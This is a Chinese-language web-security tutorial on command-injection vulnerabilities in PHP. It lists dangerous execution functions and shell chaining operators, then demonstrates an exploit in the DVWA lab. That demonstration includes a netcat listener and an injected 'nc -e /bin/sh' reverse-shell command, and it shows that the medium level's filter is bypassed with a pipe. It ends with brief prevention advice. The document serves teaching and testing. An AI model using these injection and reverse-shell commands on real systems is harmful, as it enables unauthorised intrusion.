渗透测试之命令执⾏
⼀、命令执⾏介绍
命令执⾏漏洞就是⿊客可以直接在web应⽤中执⾏系统命令,从⽽获取敏感信息或者拿下shell权限。⼆、命令执⾏原理
由于代码过滤不严格导致⽤户提交的数据被解析执⾏⽽造成的漏洞。
三、命令执⾏类型
1.系统命令执⾏漏洞:传⼊系统命令
2.PHP代码执⾏漏洞:传⼊PHP代码
四、命令执⾏函数
1.常⽤系统命令执⾏函数:
system("")
exec("")
passthru("")
``反引号与shell_exec()
popen()
proc_open()
$env
2.常⽤PHP代码执⾏函数:
eval() assert() preg_repace()
3.防御命令执⾏函数
escapeshellarg() escapeshellcmd()
4.系统命令执⾏漏洞拼接符
| 只执⾏第⼆个命令
|| 先执⾏第⼀个命令若成功则继续执⾏第⼆个命令
& 不管第⼆个命令是否执⾏成功都会执⾏第⼆个命令
&& 必须两个命令都成功才执⾏
; 类似&
=========================================================================
四、命令执⾏实验
打开DVWA,设置security level:low
正常⽤户操作应该如下:php如何运行代码
但是,由于开发的时候代码过滤不严谨,造成了⿊客可以通过⾮法输⼊执⾏未授权命令。如下:通过命令拼接,我们可以执⾏OS命令,说明这⾥存在命令执⾏漏洞。
漏洞利⽤,我们可以注⼊⼀个反向连接的命令。
⾸先,使⽤netcat监听端⼝命令: nc -vv -l -p 8080
注⼊命令:nc -e /bin/sh 192.168.164.128 8080 地址为我们本机的地址
看⼀下监听结果:
成功连接,并且执⾏系统命令。
我们将security level设置为medium,然后发现它只是过滤了; && & ||这些命令拼接符,但并没有过滤 | 所以上⾯步骤仍然有效。==================================================================================================总结:
如何避免命令注⼊漏洞?
1)尽量不适⽤哪些⽐较危险的⽅法函数
2)执⾏命令之前⼀定要使⽤过滤且避免遗漏,可以设置⽩名单的⽅式。输⼊之前,严格分析。
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论